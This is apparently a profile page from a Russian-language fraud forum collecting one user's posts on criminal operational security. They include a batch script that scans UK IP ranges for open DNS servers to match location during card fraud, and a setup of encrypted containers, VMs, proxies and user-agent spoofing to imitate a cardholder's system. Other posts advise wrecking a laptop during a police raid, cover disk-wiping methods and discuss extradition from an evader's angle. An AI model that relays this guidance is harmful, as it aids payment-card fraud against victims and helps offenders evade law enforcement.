BTC: 10777 USD
ETH: 358 USD
BCH: 226 USD
LTC: 46 USD
DASH: 68 USD
Перейти к содержанию


ACAB

Пользователи
  • Публикаций

    14
  • Зарегистрирован

  • Посещение

  • Победитель дней

    1

ACAB стал победителем дня 2 марта 2013

ACAB имел наиболее популярный контент!

Информация о ACAB

  • Звание
    Rank №2

Посетители профиля

520 просмотров профиля
  1. А ты сам как думаешь? Чем меньше тебя везде - тем безопаснее. Юзай в обязательном порядке quadrovpn можно через 3g модем. Ноут держи без корпуса, если боишься СОБРа, ломающих твои двери, успеешь ноут разбить. Ты все сам прекрасно знаешь. Компромиссов в безопасности быть не должно.
  2. по мне лучше аудио, т.к. на декоде теряем процентов 20, зато гарантировано имеем 80% материала, а на флэш тоже будем терять, но сколько это еще неясно)
  3. азия хорошо работает, корея тоже. кто ищет тот всегда найдет
  4. В этой статье я расскажу о безопасной работе с софтом. Статьи писать не умею да и пишу в первый раз , так что сильно не кричите =)) Так вот начнем Допустим мы решили замарачиваться с покером. У нас есть VmWare , Permeo Security Driver , etc.. Есть два пути либо каждый раз создавать клон виртуальной машины После того как слезаем с акка , либо вариант который опишу я. Представлю вашему вниманию программу – SandBoxie Общий смысл действия таков: если обычные программы активно обмениваются в процессе своей работы данными по пути: винчестер оперативная память файл подкачки обратно на винчестер... и т.п. то данный софт "перехватывает" все данные, которые любая программа хочет записать на винт (свои установки, временные файлы, временные интернет-файлы, пользовательские файлы) и пишет их в специально зарезервированное на винчестере место. Использование 1) Ставим на нашу машину SandBoxie 2) Запускаем =) 3) В configuration тыркаем Create new sandbox.. (называем как хотим) 4) В главном меню выбираем Function => Run SandBoxed => Any program.. (выбираем путь к нашему софту ) 5) Работаем 6) После завершения работы ( выключения клиента) SandBoxie спросит удалить наш контейнер или нет .. 7) Естественно удалить =)))) Итог : на вашей машине не появилось ненужный остатков от софта который вы использовали. hxxp://www.sandboxie.com/SandboxieInstall.exe Права на статью принадлежат её автору. Перепечатка, использование отдельных частей и т.д. в личных целях на других ресурсах разрешена только с устного соглашения автора. Copyright © 2007 Kaccup
  5. 1. Начало Неоднократно на форумах подобной тематики встречал вопросы о том, как заюзать левые DNS. Заюзать их, дело не хитрое, возникает следующий вопрос: а где-же их (DNS) взять? Некоторые доброходы набивают посты тем, что выкладывают пару штук из своих списков и/или дают пабловые. Всё это конечно хорошо. Есть один минус, приходится юзать то, что дают! Я предлагаю, в корне закрыть эту тему и воспользоваться уникальным способом ))) В данной теме мы разберем всё это подробно и в картинках. 2. Зачем это нужно. Если вы пользуетесь OpenVPN/DoubleVPN, это еще не значит, что Вы полностью спрятали своё заднее место. Воспользуемся, по моему, одним из лучших сервисов проверки своего IP. Заходим сюда: http://whoer.net/extended В моём случае получилось вот что: Как видите, мой IP отличается от DNS. Во время вбива, нам это не нужно. 3. Начинаем охоту за DNS! Для начала нам понадобится достать списки диапазонов IP по странам. Взять такой список можно здесь: http://www.proxysecu...dress-range.php В моем случае, желательно заюзать DNS из United Kingdom. Итак, выбираем нужную страну из списка и получаем диапазон IP. Это может быть диапазон в котором находитесь Вы/Ваш SOCKS/Ваш PROXY/Ваш вариант. Лично я возьму эти диапазоны: Код: 81.178.0.0 - 81.179.255.255 United kingdom 81.187.0.0 - 81.187.255.255 United kingdom 81.201.128.0 - 81.201.175.255 United kingdom 81.208.128.0 - 81.208.255.255 United kingdom 82.0.0.0 - 82.47.255.255 United kingdom 82.68.0.0 - 82.71.255.255 United kingdom 82.108.0.0 - 82.111.255.255 United kingdom 82.112.96.0 - 82.112.159.255 United kingdom 82.112.224.0 - 82.112.255.255 United kingdom 82.113.64.0 - 82.113.95.255 United kingdomОткрываем блокнот и приводим этот список к такому виду: Код: VNC.exe -i 81.178.0.0-81.179.255.255 -p 53 -cT VNC.exe -i 81.187.0.0-81.187.255.255 -p 53 -cT VNC.exe -i 81.201.128.0-81.201.175.255 -p 53 -cT VNC.exe -i 81.208.128.0-81.208.255.255 -p 53 -cT VNC.exe -i 82.0.0.0-82.47.255.255 -p 53 -cT VNC.exe -i 82.68.0.0-82.71.255.255 -p 53 -cT VNC.exe -i 82.108.0.0-82.111.255.255 -p 53 -cT VNC.exe -i 82.112.96.0-82.112.159.255 -p 53 -cT VNC.exe -i 82.112.224.0-82.112.255.255 -p 53 -cT VNC.exe -i 82.113.64.0-82.113.95.255 -p 53 -cTСохраняем этот текст, в файл, с именем "scan.bat", в предварительно созданную папку DNS, на рабочем столе ;-) Качаем вот-это: VNC.exe И ложим VNC.exe в папку рядом с файлом scan.bat. Открываем заранее приготовленный scan.bat и получаем вот такое окно: IMG Ожидаем окончание сканирования и в папке появляется файл "VNC_bypauth.txt" с примерно таким подержимым: Код: ---------------------------------------------------------------------------- COMMAND: VNC.exe -i 81.178.0.0-81.179.255.255 -p 53 -cT ---------------------------------------------------------------------------- 81.178.0.15 :53 81.178.0.214 :53 81.178.1.76 :53 81.178.1.138 :53 81.178.12.148 :53 81.178.14.73 :53 81.178.15.156 :53 81.178.18.54 :53 81.178.19.190 :53 81.178.27.85 :53 81.178.30.63 :53 81.178.30.121 :53 81.178.39.115 :53 81.178.39.176 :53Как Вы могли догадаться, мои дорогие друзья, это и есть наши насканенные DNS! Осталось их попробовать в деле. 4. Какой-же нам подойдет??? Прикол в том, что не всё то золото, что блестит. Так и в нашем случае. Я надеюсь что Вы, все знаете как вбивать собственные DNS в настройки Вашего подключения. Если да, то можно пропустить эту часть саги. Если нет, смотрим на картинки ))) В данном примере используется Windows 7. С другими ОС, думаю, проблем у Вас не возникнет. Итак, окрываем свойства подключения как на картинке: IMG и... 5. Вот он, тот который нужен!!! ... и начинаем упорно вписывать каждый IP из списка. Каждый раз после такого "вбива" не забываем провериться здесь: http://whoer.net/extended Я вбил самый первый IP (81.178.0.15), который был в списке, мне повезло. IMG Как видно на картинке выше, я добился того, чего хотел: я заюзал левый DNS. Кстати, в данном случае, на выходе я получил IP 212.74.114.213, почему так произошло? Это не важно, есть куча DNS которые будут давать на выходе свой, родной IP и нужный Вам. 6. Оконцовочка ;-) Вобщем думаю Ты, уважаемый читатель, сможешь теперь самостоятельно найти нужный тебе DNS сервер! Старался разжевать как мог! Если что-то не понятно, спрашивай в этом топике, постараюсь ответить. Кроме того, хочу передать приветы хорошим кексам со сл. никами: gustav, d1g1t0x, lukmus, Ar3s, TrueUser, amm0. Отдельные БИГ приветы: .sn4ke, XPOM, [gh0st], The $@D!$T, dMNt. 7. Копирайты: Статья (или просто заметка) написана мной: Dr.Samuil Надеюсь она Вам поможет/понравилась... Вечно Ваш, Доктор Самуил
  6. Авторы: Dr.Samuil & XPOM Заходим на http://psi-im.org/download/ Качаем последнюю версию PSI. В моём случае вот эту: http://downloads.sou....-win-setup.exe Открываем то, что скачали, и получаем вот такое окно: Нажимаем ОК. Получаем вот это: Нажимаем Далее. Получаем вот это окно: Нажимаем Принимаю. Получаем вот это окно: Нажимаем Далее. Получаем вот это окно: Нажимаем Установить. Получаем вот это окно: Ждем... Получаем вот это окно: Нажимаем готово. Установка PSI завершена! После запуска программы, Вам будет предложено настроить Ваши аккуанты: Нажимаем на кнопку "Зарегистрировать новый", если нет старого ))) Получаем окно регистрации новых аккуантов: Здесь, указываем в поле сервер "jabber.mu". Шифровать соединение: Всегда. Нажимаем далее. Получаем сл. окно: Нажимаем "Доверять" и получаем сл. окно: Здесь, my_nick - Ваш ник, который будет стоять перед @jabber.mu Пароль, рекомендую поставить посложнее... Нажимаем Далее... Поздравляю! Вы зарегистрированы =) В данном примере, Ваш Jabber ID = 'my_nick@jabber.mu'. Нажимаем ОК... "Полезные советы" можно отключить. Теперь, можно подключаться =)
  7. Способы уничтожения информации, хранимой на HDD В настоящее время существует несколько способов уничтожения информации, хранимой на HDD. Уничтожение подразумевает стирание или удаление (очистку) информации с HDD таким образом, что ее невозможно восстановить ни обработкой на компьютерах с помощью специального ПО, ни с помощью лабораторных средств (например, изучение поверхностей магнитных пластин с помощью сканирующей микроскопии). Способы уничтожения информации на HDD делятся на три большие группы: 1. Программные, в основу которых положено уничтожение информации, записанной на магнитном носителе, посредством штатных средств записи информации на магнитных носителях. В случае уничтожения информации на HDD программным методом, он может быть повторно использован в других ПК, после инсталляции новой ОС и приложений. Уничтожение производится наиболее простым и естественным способом - перезаписью информации. Перезапись - это процесс записи несекретных данных в область памяти, где ранее содержались секретные данные. Следует отметить очень важную деталь - при перезаписи информации работоспособность HDD полностью сохраняется, в случае, если он был полностью исправным. На изношенном или неисправном HDD провести надежное уничтожение информации невозможно. 2. Механические, связанные с механическим повреждением основы, на которую нанесен магнитный слой - физический носитель информации. 3. Физические, связанные с физическими принципами цифровой записи на магнитный носитель, и основанные на перестройке структуры магнитного материала рабочих поверхностей носителя. По способу воздействия на устройство: 1. Без разрушения конструкции и поверхностей. 2. С разрушением HDD. Коротко о физических основах восстановления информации. В современных HDD запись информации на магнитный диск производят только головки записи. При воздействии магнитного поля головки происходит рост количества и размеров магнитных доменов, ориентированных по направлению этого поля. На магнитной поверхности под головкой создается информативная остаточная намагниченность, которая и регистрируется при считывании. Уровень магнитного поля головки меньше уровня насыщения магнитной среды, поэтому остаются магнитные домены сравнительно малого объема, ориентированные по направлению предшествующего магнитного воздействия. Магнитное поле этих доменов слабое и не влияет на результат считывания штатным контроллером. Однако эти домены могут быть обнаружены более чувствительными специальными головками (датчиками) или выявлены при детальном анализе тонкой структуры магнитного поля, порождаемого участком рабочей поверхности накопителя. Механические методы уничтожения информации подразделяются на: -Механического воздействия. Измельчение носителя путем пропускания через устройство измельчения (шредер). HDD разрушается механически так, чтобы исключить возможность прочтения информации каким-либо способом с его рабочих поверхностей. При этом методе существует опасность, что при измельчении могут остаться фрагменты, достаточно крупные, чтобы восстановить информацию в лабораторных условиях. Вскрытие корпуса гермокамеры в рабочем помещении (или в бытовых условиях) приводит к загрязнению пластин и выводу HDD через несколько часов из строя. В современном HDD диск стирается попавшей пылью до основы (прозрачной стеклянной подложки), как наждаком, при последующей работе после вскрытия гермокамеры. Часто используемые на практике методы сверления отверстий и удары молотком по HDD на самом деле не уничтожают вовсе или уничтожают малую часть информации. -Термический. Нагревание носителя до температуры плавления в специальных печах. При этом способе гарантия уничтожения информации наступает при разогреве носителя до температуры 800-1000'С. В этом случае информация становится абсолютно невосстанавливаемой по целому комплексу причин, в том числе и из-за перехода магнитного материала покрытий через точку Кюри. Такой способ уничтожения информации может быть рекомендован для носителей, содержащих государственную тайну. Пожар в помещении, где находятся ПК или костер из HDD не приводят к уничтожению информации. - Пиротехнический. Разрушение носителя взрывом. - Металлотермический. Уничтожение основы носителя, на который непосредственно нанесено магнитное покрытые, высокой температурой самораспространяющегося высокотемпературного синтеза (СВС). При этом на основу наносится специальный слой термитного покрытия. - Химический. Разрушение рабочего слоя или основы носителя химически агрессивными средами. - Радиационный. Разрушение носителя ионизирующими излучениями. Как видно некоторые методы экологически небезопасны, другие могут обеспечить высокую надежность уничтожения инфор¬мации, но требуют настолько специфического и дорогостоящего оборудования, которое могут позволить себе лишь единичные корпоративные пользователи. Во всех этих методах отсутствует возможность повторного использования HDD. Физические методы уничтожения информации на HDD. Для уничтожения информации на магнитных пластинах HDD необходимо устранить однородности вектора намагниченности участков рабочей поверхности, несущих информацию о предшествующих записях. Указанное изменение структуры поля вектора намагниченности магнитного слоя может быть выполнено несколькими принципиально различными способами: -путем быстрого нагрева материала рабочего слоя носителя до точки потери намагниченности носителя (точки Кюри); -путем размагничивания рабочих поверхностей носителя; -путем намагничивания рабочих поверхностей носителя до максимально возмог значений намагниченности (насыщения). -комбинированный. Нагревание и намагничивание, либо нагревание и размагничивание. Первый способ (нагревание) основывается на одном из важных эффектов магнетизма - при нагревании ферромагнетика до определенной температуры, превышающей точку Кюри, интенсивность теплового движения атомов становится достаточной для разрушения его самопроизвольной намагниченности, и он становится парамагнетиком. При этой температуре ферромагнитный материал рабочего слоя теряет свою остаточную намагниченность, и все следы ранее записанной информации гарантированно уничтожаются. Температура, соответствующая точке Кюри большинства ферромагнитных материалов рабочего слоя носителей информации, составляет несколько сот градусов. При этом надо учитывать, что каждый производитель HDD держит в секрете слои основы и состав ферромагнитного покрытия. Вероятнее всего, наиболее уязвимыми для температурных воздействий компонентами рабочего слоя и основы HDD окажутся связующие материалы органической природы. В этом случае при нагревании до высоких температур HDD выйдет из строя по причине плавления элементов конструкции, имеющих температуру плавления или деформации меньше точки Кюри для данного магнитного носителя. Намагничивание. Способ основан на положении, что в случае HDD внешнее магнитное поле рассматривается как аналог поля, создаваемого магнитными головками при записи. Если характеристики внешнего поля будут превышать напряженность поля, создаваемого головками на такую величину, при которой произойдет магнитное насыщение материала поверхности диска, то все магнитные домены будут переориентированы по направлению этого внешнего поля и вся информация на HDD будет уничтожена. Импульсные намагничивающие установки обеспечивают: - Возможность создания сильных намагничивающих полей с малыми энергетическими затратами. - Кратковременность воздействия импульсного поля на образец. - Возможность помещения HDD целиком в камеру намагничи¬вания; - Возможность применения простых индукторных систем разомкнутого типа без магнитопровода; - Формирования магнитного поля необходимой направленности. Программные способы уничтожения информации на HDD: 1) Начальный уровень (уровень 0) Наиболее простая и часто применяемая форма уничтожения информации на HDD. Вместо полного стирания HDD в загрузочный сектор, основную и резервную таблицу разделов записывается последовательность нулей. В этом случае данные на диске не уничтожаются, к ним усложняется доступ. Полный доступ к информации на HDD легко восстанавливается с помощью специального ПО производящего анализ секторов диска (Norton DiskEdit, WinHex и др). 2) Уровень 1 Производится запись последовательности нулей или единиц в сектора данных. При этом уничтожается не только загрузочная область, но и данные. Обычным пользователям в этом случае практически невозможно восстановить уничтоженную информацию. Тем не менее, существует возможность восстановления информации при стирании перезаписью. В основе ее лежат: - ошибки оператора и неправильное использование ПО. - отказ ПО перезаписывать все адресуемое пространство диска. - остаточная информация в дефектных секторах, - анализ зон остаточной намагниченности и эффект краев дорожек. Восстановить информацию, удаленную этим методом стандартными средствами невозможно. Для восстановления требуются специальные знания и оборудование. 3) Уровень 1 + Используются несколько циклов перезаписи информации. Чем больше циклов перезаписи информации, тем сложнее восстановить удаленные данные. Это связано с неточностью позиционирования головки. Чем больше раз головка перезапишет данные, тем выше вероятность, что она сотрет зоны остаточной намагниченности на краях дорожки. Перезапись затрудняет процесс восстановления информации, но такая возможность остается. Для восстановления информации требуется очень дорогое и сложное оборудование. Алгоритмы уничтожения данных. МО США (NISPO) DoD 5220.22-М, 1995г Количество циклов записи - 3 Цикл 1 -запись произвольного кода Цикл 2 - запись инвертированного кеда Цикл 3 - запись случайных кодов Примечание: NISPO запрещает использование этого алгоритма для уничтожения данных с грифом: «СОВ.СЕКРЕТНО» Альтернативные способы (в соответствии с NISPO): - размагничивание; - физическое разрушение. Стандарт VISR, 1999г. (Германия) Количество циклов записи - 3 Цикл 1 - запись нулей Цикл 2 - запись единиц Цикл 3 - запись кода с чередованием нулей и единиц. ГОСТ Р50739-95г. (Россия) Для классов защиты данных 1 ..3 количество циклов записи - 2 Цикл 1 - запись нулей Цикл 2 - запись случайных кодов Для классов защиты данных 4..6 Один цикл записи нулей. Алгоритм Брюса Шнейера (Bruce Schneier) Количество циклов записи - 7 Цикл 1 - запись единиц Цикл 2 - запись нулей Циклы 3..7 - запись случайных кодов. Алгоритм Питера Гутмана (Peter Gutman) Количество циклов - 35 Циклы 1 ..4 - запись произвольного кода Циклы 5. .6 - запись кодов 55h, AAh Циклы 7..9 - запись кодов 92h, 49h, 24h Циклы 10..25 - последовательная запись кодов от 00, 11h, 22h и т.д. до FFh Циклы 26..28 - аналогично циклам 7..9 Циклы 29..31 - запись кода 6Dh, B6h Циклы 32..35 - аналогично циклам 1.4 На мой взгляд, лучшей программой, в которой присутствуют все вышеуказанные алгоритмы, является Acronis Privacy Expert. www.acronis.com Права на статью принадлежат её автору. Перепечатка, использование отдельных частей и т.д. в личных целях на других ресурсах разрешена только с устного соглашения автора. Copyright © 2005 Satanael
  8. Попытаемся разобраться с вопросом выдачи преступников (или подозреваемых) в небольшом обзоре. Экстрадиция – это официальный процесс, через который одно государство запрашивает и добивается выдачи подозреваемого или осужденного преступника. Экстрадиция между странами регулируется соглашениями. Между регионами одной страны (например, между штатами в США) также может производиться передача подозреваемых и осужденных, но это не экстрадиция в точном понимании термина. Экстрадиция может осуществляться лишь в отношении определенных преступлений — как правило, их список либо критерии их определения (тяжесть наказания и т. п.) устанавливается в договоре. Традиционно должно соблюдаться правило «двойной подсудности», то есть преступление, за совершение которого запрашивается выдача, должно признаваться таковым в законодательстве как запрашивающей, так и запрашиваемой стороны. При этом договорами предусмотрены условия, которые позволяют отказать в экстрадиции. К ним относятся, главным образом, обоснованные подозрения запрашиваемого государства о том, что лицо преследуется по политическим мотивам или что в случае выдачи оно может быть подвергнуто пыткам или смертной казни. Договора и соглашения об экстрадиции В международном праве есть некий консенсус относительно того, что у страны отсутствует обязанность передавать подозреваемых преступников. Это вытекает из принципа суверенитета над территорией. Такое отсутствие международного обязательства и желание запрашивать преступников из других стран повлекли к жизни большую сеть соглашений об экстрадиции. И надо сказать, что большинство стран мира подписало двусторонние соглашения со многими странами. При этом ни у одной страны мира на сегодня нет соглашений со всеми странами мира. Например, Соединенные Штаты не имеют договоров об экстрадиции с более чем пятьюдесятью странами, включая Китайскую Народную Республику, Намибию и Северную Корею. Российская Федерация Согласно мировой практике, в большинстве стран мира своих граждан не выдают. Этот принцип закреплён в конституциях многих государств, в том числе и в конституции РФ. Россия является членом Европейской Конвенции об экстрадиции 1957 г., она подписала эту Конвенцию с оговорками, запрещающими выдачу российских граждан. Статья 61 Конституции РФ гласит, что гражданин Российской Федерации не может быть выслан за пределы Российской Федерации или выдан другому государству. Такие же положения есть в законодательстве Израиля. Страны Евросоюза Все страны ЕС имеют между собой правовые соглашения, позволяющие выдачу своих граждан. Великобритания, согласно Акту об экстрадиции 2003, обязана выдавать, в том числе и своих граждан в ряд государств, с которыми она имеет соответствующие межправительственные соглашения. Аналогичная ситуация и в США. Наибольшего прогресса в упрощении экстрадиции добились страны-члены Европейского союза, которые ввели в отношениях между собой так называемый «Европейский ордер на арест». Фактически он предполагает автоматическое исполнение запроса о передаче предполагаемого преступника, без проверки этого запроса с точки зрения содержания. Процедура экстрадиции (выдачи): Процедура выдачи начинается с направления одним государством другому соответствующего запроса. Обычно предусматривается составление запроса либо на языке запрашиваемой стороны, либо на одном из языков международного общения (английский, французский — в зависимости от требования запрашиваемой стороны). Запросы передаются либо через министерства иностранных дел, либо напрямую через правоохранительные органы (министерства внутренних дел, юстиции, прокуратура и т. п.). В случае задержания предполагаемого преступника в запрашиваемом государстве начинается судебная процедура. Роль суда — подтвердить юридическую обоснованность запроса и соблюдение всех соответствующих требований. Если суд отклоняет запрос, процедура прекращается. Если же суд подтверждает возможность выдачи, решение принимается административными органами. Считается, что окончательное решение о выдаче лица носит политический характер. Современные тенденции В современном международном праве наблюдается тенденция упрощения процедуры выдачи. В частности, идет речь о смягчении требований «двойной подсудности», сокращении числа оснований отказа в выдаче, сокращении роли административных органов. Тормозом в этом процессе является неготовность государств безоговорочно признавать выданные в других странах ордера на арест ввиду различия судебных систем, а порой и недоверия друг к другу. И небольшой FAQ от юриста: Вопрос: Если гражданин Украины оформит гражданство Австрии, а потом откажется от украинского гражданства, то в случае заведения на него в Украине уголовного дела его выдадут или нет? Ответ: Украина ратифицировала целый ряд международно-правовых актов, регламентирующих порядок выдачи лиц, подозреваемых или обвиняемых, в совершении преступлений: Европейскую конвенцию о выдаче правонарушителей 1957 года с дополнительными протоколами к ней; конвенцию о правовой помощи и правовых отношениях в гражданских, семейных и уголовных делах, подписанную в Минске в 1993 году и дополненную через четыре года. Кроме того, Украина заключила двусторонние договоры о правовой помощи, предусматривающие экстрадицию, с Китаем, Польшей, Литвой, Латвией и Эстонией, Грузией и Монголией. Договоры о непосредственной выдаче правонарушителей Украина заключила с Индией и Китаем. Украина является правопреемницей международных договоров СССР о правовой помощи с Албанией, Венгрией, Вьетнамом, Болгарией, Грецией, Кипром, Кубой и Румынией. Как видите, Австрии в этом списке тоже нет. Но это не означает, что выдача из Австрии в Украину невозможна в принципе. Единственное, что могу сказать, это что Конституция Австрийской Республики (ст. 9. (1)) предусматривает, что общепризнанные нормы международного права действуют в качестве составной части федерального права. Вместе с тем объявление международного договора частью права страны не означает автоматического применения договорных норм. Нормы международных договоров должны быть интегрированы в правовую систему государства в качестве части права страны, соответствовать ее принципам, применяться в рамках соответствующих правовых процедур, устанавливаемых национальным законодательством. Способы и средства реализации норм международного права относятся к исключительной компетенции государства и отличаются существенным разнообразием. Государство, имеющее действительные международные обязательства, должно внести в свое законодательство изменения в той мере, в какой это необходимо для осуществления международных обязательств. Сделает ли оно это путем формального принятия международного права, например в форме трансформационной оговорки, или в форме издания закона, распоряжения или инструкции, либо предоставит решение данной проблемы своей исполнительной власти, - с точки зрения международного права является его собственным делом. Международное право требует только выполнения договора. Вышеуказанные положения весьма актуальны для международных договоров об экстрадиции, эффективное осуществление которой было бы невозможно без соответствующих законодательных мер, осуществляемых на национальном уровне. Регулирование экстрадиции в международном уголовном праве осуществляется посредством многосторонних конвенций (Европейская конвенция об экстрадиции, Межамериканская конвенция о выдаче и т.д.), участники которых после ратификации (присоединения, одобрения) принимают на себя определенные обязательства, выполнение которых требует принятия соответствующих законодательных мер на национальном уровне. Вопрос: Как обстоит дело с экстрадицией граждан Сент-Китс и Невис(гражданство легко покупается путем покупки недвижимости) в Украину? Ответ: Граждане Сент-Китс и Невис могут быть выданы в страны, с которыми у Сент-Китс есть договор, предусматривающий возможность выдачи. Сент-Китс и Невис имеет такие договора Соединенными Штатами, Канадой и Великобританией. Дополнительно к перечисленным странам есть так называемый Fugitive Offenders Act, согласно которому лица, совершившие преступления в любой стране Британского Содружества, могут быть выданы. Упомянутый закон является частью законодательства всех стран Британского Содружества. Договора об экстрадиции с Украиной или Россией нет.
  9. И так, дело было вечером в воскресенье, делать было нечего. Взгляд упал на эту тему Настройка безопасности компьютера и на то что многие просят перезалить статью, обновить ссылки и так далее. Поэтому решил помочь нуждающимся Нового я тут ничего не открою, но некоторым надеюсь поможет. Вариантов настройки машины под работу масса, я раскажу как сделано у меня. Для начала рекомендую создать себе закриптованый контейнер в файле на жестком диске, где мы будем хранить всё что непосредственно касается работы, а лучше взятьпортативный USB жесткий диск и закриптовать его. Криптуем при помощи программы TrueCrypt. Как криптовать этой программой - это отдельная статья, которых куча на просторах интернета(ПРИМЕР-1, ПРИМЕР-2). Поэтому не буду здесь описывать этот процесс. Закриптовали. Отлично. Мантируем контейнер и теперь он у нас как локальный диск. Теперь всё что непосредственно косается работы будем хранить в нашем контейнере. Все браузеры, программы, jabber/icq клиенты с которыми работаем скачиваем версии portable и храним там же. Думаю что такое portable объяснять не надо. Для чего? Для того что бы все cookies, хистори, логи и т.п. тоже хронились в закриптованом контейнере а не на основной системе. Непосредственно шифрование переписки в jabber. Jabber + PSI + GnuPG в картинках!. Скажем большое спасибо за статью Dr.Samuil Теперь сама работа, настройка системы. Работать будем с виртуалки. Скачиваем VirtualBox (тоже portable, не забываем). Скидываем тоже в контейнер. Запускаем. Сразу идем по вкладке Файл>Свойства, выставляем папкой для машин паку в нашем контейнере(локальном диске после того как мы его смонтировали). Скачиваем Windows ENG(ну или какая вам нужна) без всяких приблуд самую простую и маленькую по размеру, нам же для работы Я лично скачал себе XP-eng на 600мб. Установка и настройка VirtualBox Теперь у нас есть виртуальная система для работы. Запускаем. И уже здесь в виртуалке устанавливаем vpn клиент, proxyfier, firefox, ссleaner, вообщем всё что вам нужно. Была у меня проблема что OpenVPN не работал на основной системе, т.к. на ней интернет был VPN-pppoe, всё решилось именно через виртуалку, может кто-то тоже сталкнёться с этим. Что касается ProxyFier, то я предпочитаю версию 2.91, а не последнюю. Что бы DNS определялся сокса, а не ваш или VPN. Заходим по вкладке Options>Name Resolution,Resolve Hostnames ставим Remotely. Для FireFox советую скачать аддон User Agent RG для изменения useragent под нужный браузер или User Agent Switcher если вам в добавок нужно в заголовках что то менять, делать систему как систему холдера к примеру. PS Не забывайте размонтировать контейнер и cделать безопасное извлечение(если у вас USB) перед выходом из основной системы компьютера. Помните, если вас сильно захотят найти, то рано или поздно найдут при любом раскладе... Copyright © 2012 Gr00z
  10. Самые популярные: gmail.com yahoo.com hotmail.com mail.com aol.com hushmail.com safe-mail.net Все по алфавиту: (В списке могут присутствовать нерабочие сервера и сервера стран СНГ ) @ 111mail.com @ 123iran.com @ 1-usa.com @ 2die4.com @ 37.com @ 420email.com @ 4degreez.com @ 4-music-today.com @ 5.am @ 5005.lv @ 8.am @ a.ua @ a.org.ua @ abha.cc @ accountant.com @ actingbiz.com @ adexec.com @ africamail.com @ agadir.cc @ ahsa.ws @ ajman.cc @ ajman.us @ ajman.ws @ albaha.cc @ alex4all.com @ alexandria.cc @ algerie.cc @ allergist.com @ allhiphop.com @ alriyadh.cc @ alumnidirector.com @ amman.cc @ anatomicrock.com @ animeone.com @ anjungcafe.com @ aqaba.cc @ aol.com @ arar.ws @ archaeologist.com @ arcticmail.com @ artlover.com @ asia.com @ asiancutes.com @ aswan.cc @ a-teens.net @ ausi.com @ australiamail.com @ autoindia.com @ autopm.com @ baalbeck.cc @ bahraini.cc @ banha.cc @ barriolife.com @ b-boy.com @ beautifulboy.com @ berlin.com @ bgay.com @ bicycledata.com @ bicycling.com @ bigheavyworld.com @ bigmailbox.net @ bikerheaven.net @ bikerider.com @ bikermail.com @ billssite.com @ bizerte.cc @ bk.ru @ blackandchristian.com @ blackcity.net @ blackvault.com @ blida.info @ bmx.lv @ bmxtrix.com @ boarderzone.com @ boatnerd.com @ bolbox.com @ bongmail.com @ bowl.com @ box.az @ buraydah.cc @ butch-femme.org @ byke.com @ calle22.com @ cameroon.cc @ cannabismail.com @ catlover.com @ catlovers.com @ certifiedbitches.com @ championboxing.com @ chatway.com @ cheerful.com @ chemist.com @ chillymail.com @ classprod.com @ classycouples.com @ clerk.com @ cliffhanger.com @ columnist.com @ comic.com @ company.org.ua @ congiu.net @ consultant.com @ coolmail.ru @ coolshit.com @ corpusmail.com @ counsellor.com @ cutey.com @ cyberunlimited.org @ cycledata.com @ darkfear.com @ darkforces.com @ deliveryman.com @ dhahran.cc @ dhofar.cc @ dino.lv @ diplomats.com @ dirtythird.com @ djibouti.cc @ doctor.com @ doglover.com @ dominican.cc @ dopefiends.com @ dr.com @ draac.com @ drakmail.net @ dr-dre.com @ dreamstop.com @ dublin.com @ earthling.net @ earthling.net @ eclub.lv @ egypt.net @ e-mail.am @ email.com @ e-mail.ru @ emailfast.com @ emails.ru @ e-mails.ru @ eminemfans .com @ envirocitizen.com @ eritrea.cc @ eritrea.cc @ escapeartist.com @ europe.com @ execs.com @ ezsweeps.com @ falasteen.cc @ famous.as @ farts.com @ feelingnaughty.com @ financier.com @ firemyst.com @ fit.lv @ freeonline.com @ fromru.com @ front.ru @ fudge.com @ fujairah.cc @ fujairah.us @ fujairah.ws @ funkytimes.com @ gabes.cc @ gafsa.cc @ gala.net @ gamerssolution.com @ gardener.com @ gawab.com @ gazabo.net @ geologist.com @ giza.cc @ glittergrrrls.com @ gmail.com @ goatrance.com @ goddess.com @ gohip.com @ goldenmail.ru @ goldmail.ru @ gospelcity.com @ gothicgirl.com @ gotomy.com @ grapemail.net @ graphic-designer.com @ greatautos.org @ guinea.cc @ guinea.cc @ guy.com @ hacker.am @ hairdresser.net @ haitisurf.com @ hamra.cc @ happyhippo.com @ hasakah.com @ hateinthebox.com @ hebron.tv @ hip hopmail.com @ homs.cc @ hotbox.ru @ hotmail.com @ hotmail.ru @ hot-shot.com @ houseofhorrors.com @ hugkiss.com @ hullnumber.com @ human.lv @ ibra.cc @ idunno4recipes.com @ ihatenetscape.com @ inbox.ru @ inorbit.com @ insurer.com @ intimatefire.com @ iphon.biz @ irbid.ws @ irow.com @ ismailia.cc @ jadida.cc @ jadida.org @ japan.com @ jazzemail.com @ jerash.cc @ jizan.cc @ jouf.cc @ journalist.com @ juanitabynum.com @ kairouan.cc @ kanoodle.com @ karak.cc @ khaimah.cc @ khartoum.cc @ khobar.cc @ kickboxing.com @ kidrock.com @ kinkyemail.com @ kool-things.com @ krovatka.net @ kuwaiti.tv @ kyrgyzstan.cc @ land.ru @ latakia.cc @ latchess.com @ latinabarbie.com @ latinogreeks.com @ lawyer.com @ lebanese.cc @ leesville.com @ legislator.com @ list.ru @ lobbyist.com @ london.com @ loveable.com @ loveemail.com @ loveis.lv @ lovers-mail.com @ lowrider.com @ lowrider.com @ lubnan.cc @ lubnan.ws @ lucky7lotto.net @ lv-inter.net @ mad.scientist.com @ madeniggaz.net @ madinah.cc @ madrid.com @ maghreb.cc @ mail.com @ mail.ru @ mail15.com @ mail333.com @ mailbomb.com @ manama.cc @ mansoura.tv @ marillion.net @ marrakesh.cc @ mascara.ws @ megarave.com @ meknes.cc @ mesra.net @ mindless.com @ minister.com @ mofa.com @ moscowmail.com @ motley.com @ munich.com @ muscat.tv @ muscat.ws @ music.com @ musician.net @ musician.org @ musicsites.com @ myself.com @ mymail-in.net @ mytop-in.net @ nabeul.cc @ nabeul.info @ nablus.cc @ nador.cc @ najaf.cc @ narod.ru @ netbroadcaster.com @ netfingers.com @ net-surf.com @ nettaxi.com @ newmail.ru @ ni cedriveway.com @ nightmail.ru @ nm.ru @ nocharge.com @ nycmail.com @ omani.ws @ omdurman.cc @ operationivy.com @ optician.com @ oran.cc @ oued.info @ oued.org @ oujda.biz @ oujda.cc @ paidoffers.net @ pakistani.ws @ palmyra.cc @ palmyra.ws @ pcbee.com @ pediatrician.com @ persian.com @ petrofind.com @ peugeot-club.org @ phunkybitches.com @ pikaguam.com @ pinkcity.net @ pisem.net @ pitbullmail.com @ planetsmeg.com @ playful.com 